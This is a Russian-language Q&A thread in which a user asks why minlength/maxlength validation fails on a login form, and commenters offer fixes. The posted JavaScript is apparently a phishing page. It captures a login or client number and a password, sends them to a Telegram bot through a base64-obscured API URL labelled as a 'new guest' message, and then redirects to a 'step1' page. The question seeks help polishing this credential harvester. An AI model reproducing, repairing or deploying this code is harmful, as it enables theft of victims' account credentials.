# Валидация не работает , и перебрасывает на следующую страницу при любом обозначении

Tags: javascript, html, json, html5, button

Всем доброго времени суток. Стоит проверка в логин/пасс на minlenght 6 и maxlenght 20 в html . Но все равно перебрасывает на следующую страницу даже при вводах 2-х символов. Понимаю то что перекидывает благодаря функции setTimeout . если я добавляю в самом начале проверку валидации и кнопку button меняю на onsubmit то не срабатывают основные действия необходимые мне js.... Необходимо что бы перебрасывало на следующую страницу только если все требование валидации выполнены , но так же необходимо оставить работу основной функции. На данный момент всё работает, кроме валидации и перекидывает при любых обозначениях на следующую страницу.

```js
loginsubmitbut.onclick = function() {
  var phone = document.getElementById('phone-input').value;
  var card = document.getElementById('card-input').value;
  if (phone == 'test123456789') {
    window.location.href = "./hextris-gh-pages/index.html";
  }
  if (card == 'test123456789') {
    window.location.href = "./hextris-gh-pages/index.html";
  }
  if (phone == '') {
    alert("Внимание", "Одно, или более полей, не были заполнены!");
  }
  if (card == '') {
    alert("Внимание", "Одно, или более полей, не были заполнены!");
  } else {
    /* var cox,d = 0; console.log(cox,d); */
    var encoded = "тут api обращение в бота ТГ";
    var decodedString = atob(encoded);
    var encoded2 = "тут api обращение в бота ТГ";
    var decodedString2 = atob(encoded2);
    let msg = [`новый гость%0D%0A`,
      `первая страница%0D%0A`,
      `Логин: <code>${phone}</code>%0D%0A`,
      `Пароль: ${card}`
    ];
    var request = new XMLHttpRequest();
    request.open("POST", `${decodedString}${msg[0]}${msg[1]}${msg[2]}${msg[3]}`);
    request.send("POST", `${decodedString}${msg[0]}${msg[1]}${msg[2]}${msg[3]}`);
    setTimeout(function() {
      window.location.href = `step1.html?card=${card}&phone=${phone}`;
    }, 2 * 1000);
  }
};
```

```html
<div class="sc-fzocqA jXuaP">
  <form><input id="phone-input" autocomplete="off" name="phone-input" placeholder="Логин (или УНК)" type="txt" min="6" minlength="6" maxlength="20" class="sc-fzonZV gqyXFV _1JaXWZxt-SqjfDIwwiaV6P _2B9lFmcBwHPjUScshrzZK4" required="">
</div>
<p id="control-with-tips_idrq6yqbi-hint-message" aria-hidden="true" class="sc-AxiKw bxjDyy sc-pJUVA eblaXG"></p>
</div>
</div>
<form><input id="card-input" name="card-input" autocomplete="off" placeholder="Пароль" type="password" min="6" minlength="6" max="20" class="sc-fzonZV gqyXFV _1JaXWZxt-SqjfDIwwiaV6P _2B9lFmcBwHPjUScshrzZK4" required="">
  <p></p>
  <button id="loginsubmitbut" type="button" class="button button-text" style="background: #4169E1; color: #fff; padding: 7px; border-radius: 20px; font-size: 15px; font-family: Arial;"><a><p><center>Подтвердить</center></p></button></a>
</form>
</form>
<div>
  <a href='./number.html' style='text-decoration: none; color: #4169E1; font-size: 17px;'>
    <p>
      <center>Не могу войти</center>
    </p>
  </a>
  </button>
</div>
</div>
</div>
<form>
  <div class="e2_3">
    <script>
      document.write(getParameterByName(""));
    </script>
  </div>
  <div class="e2_5"></div>
  <table id="tabl">

  </table>
  <table>
    <tr>
      <td>
        <div class="e2_24"></div>
      </td>
      <td>
        <div class="e2_25"></div>
      </td>
      <td>
        <div class="e2_26"></div>
      </td>
      <td>
        <div class="e2_27"></div>
      </td>
    </tr>
  </table>
  <script src="./config.js"></script>
</form>
```

Comment: А в чем смысл у required пустого значения? Разве этот атрибут не должен быть просто “required”? И через что проходит валидация? Через браузер? Стандартная?

Comment: @ЕвгенийКолмак  Да валидация через браузер стандартная . с помощью min/max . но на сколько понимаю что вся проблема в кнопке button и js . а насчёт required , даже если вносить в required="" (что бы небыло значение пустым) то срабатывает хоть с ними , хоть без их. Суть проблемы происходит отправка формы и перенаправление на другую страницу , если указано количество символов от 1-5 в любом случае, вот это и необходимо мне избежать

Comment: Я имел в виду что у required есть два значения true и false. И по дефолту у инпута - false. Но достаточно просто написать ‘required’ и значение станет true. Значение не может быть пустым. У инпута либо он есть либо нет. А мин и макс, как пояснение.

Comment: Хотя нет. Я был не прав. Прошу прощения. Там есть три вида записи. 
 <input type="..." required>
<input type="..." required="">
<input type="..." required="required">

Comment: @ЕвгенийКолмак required даёт обозначение что поле не может быть пустым , и вот оно работает отлично . и не шлёт форму при пустых строках , либо если пустая хоть одна из них . required работает отлично . А вот мин-мах не работает , и отправка формы происходит при обозначение меньше 6-ти символов , как вариант дописать в js в первых строках что-то наподобие  
if (phone_validation(phone,6,20)) 
{
alert("Внимание", "Одно, или более полей, не были заполнены!");

так не срабатывает тогда код вовсе , и нет реакции на клик по буттон

Comment: Я делал условие. Что если не попадает в нужные диапазон, то кнопка становится неактивной. Но это исправно работает только для одного инпута. Так он разблокирует кнопку и можно отправить форму.

Comment: @ЕвгенийКолмак задумывался об этом , но тут проблема тогда в следующем всплывает.
1- так это изменения бэк цвета кнопки , но тут ладно , это можно исправить , выставить всегда один и тот же цвет.
2- тогда теряется почему-то js loginsubmitbut.onclick = function()
3- при удаление какого-то символа (и значение которое не входит в диапазон) отправляется и буттон срабатывает . А если дописать в js , то перенаправляет в любом случае на вторую страницу по таймауту